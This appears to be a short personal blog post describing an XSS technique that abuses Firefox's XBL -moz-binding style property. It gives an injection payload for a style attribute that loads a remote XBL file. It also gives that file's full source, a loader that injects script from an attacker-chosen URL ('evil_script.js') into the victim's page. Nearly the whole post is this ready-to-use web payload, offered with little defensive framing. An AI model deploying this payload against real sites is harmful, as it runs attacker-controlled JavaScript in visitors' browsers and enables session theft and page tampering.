Martin Paul Eve bio photo

Martin Paul Eve

Professor of Literature, Technology and Publishing at Birkbeck, University of London

Email Books Twitter Google+ Github Stackoverflow MLA CORE Institutional Repo Hypothes.is ORCID ID   ORCID iD

Email Updates

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context.

The process works as follows:

  1. Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
  2. Browser loads XBL document.
  3. XBL document modifies DOM to include <script src="evil_script.js"/>.
  4. Browser loads and parses Javascript.

The required XBL document (STXSS_XBL.xml) is as follows:

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
    <binding id="loader">
        <implementation>
            <constructor>
                <![CDATA[
                    //This is the STXSS XBL Loader
                    //Edit this line to the URL of the STXSS Javascript
                    var url = "http://www.your-site.com/STXSS_JS.js";
                    //Do not edit below this line
                    var scr = document.createElement("script");
                    scr.setAttribute("src",url);
                    var bodyElement = document.getElementsByTagName("html").item(0);
                    bodyElement.appendChild(scr);
                 ]]>
            </constructor>
        </implementation>
    </binding>
</bindings>